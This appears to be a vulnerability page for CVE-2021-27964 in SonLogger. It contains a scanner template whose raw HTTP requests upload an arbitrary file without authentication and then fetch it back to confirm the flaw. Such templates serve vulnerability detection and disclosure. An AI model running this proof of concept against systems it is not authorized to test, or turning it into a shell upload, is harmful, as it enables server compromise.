CVE-2021-27964: SonLogger - Arbitrary File Upload

2025-08-01 SonLogger PoC Public

Description

SonLogger before 6.4.1 is affected by Unauthenticated Arbitrary File Upload. An attacker can send a POST request to /Config/SaveUploadedHotspotLogoFile without any authentication or session header. There is no check for the file extension or content of the uploaded file.

PoC

id: CVE-2021-27964

info:
  name: SonLogger - Arbitrary File Upload
  author: DhiyaneshDK
  severity: critical
  description: |
    SonLogger before 6.4.1 is affected by Unauthenticated Arbitrary File Upload. An attacker can send a POST request to /Config/SaveUploadedHotspotLogoFile without any authentication or session header. There is no check for the file extension or content of the uploaded file.
  impact: |
    Unauthenticated attackers can upload malicious files without extension validation, achieving remote code execution and complete server compromise.
  remediation: |
    Upgrade to SonLogger version 6.4.1 or later.
  reference:
    - https://erberkan.github.io/2021/SonLogger-vulns/
    - https://github.com/erberkan/SonLogger-vulns
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27964
    cwe-id: CWE-434
    epss-score: 0.47519
    epss-percentile: 0.9878
    cpe: cpe:2.3:a:sfcyazilim:sonlogger:*:*:*:*:*:*:*:*
  metadata:
    vendor: sfcyazilim
    product: sonlogger
    fofa-query: body="SonLogger"
    max-request: 2
  tags: cve,cve2021,sonlogger,intrusive,vkev,vuln

flow: http(1) && http(2)

variables:
  file: "{{to_lower(rand_text_alpha(5))}}"
  rand: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywBBYcU9lVZ
        X-Requested-With: XMLHttpRequest

        ------WebKitFormBoundarywBBYcU9lVZ
        Content-Disposition: form-data; name="file"; filename="{{file}}.txt"
        Content-Type: image/png

        {{rand}}
        ------WebKitFormBoundarywBBYcU9lVZ--

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains(body, 'Message')
        condition: and
        internal: true

  - raw:
      - |
        GET /Assets/temp/hotspot/img/{{file}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, '{{rand}}')
        condition: and
# digest: 4b0a004830460221008cc6e45de2ef0bf3422dd874ce4100f5ff7099f0cfc1eb31ed7eb38cd900bf6f022100f0fb71ab23ee94daf829d993f97b2938ed0844c757bc5bc84dafed48eedfe6f4:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities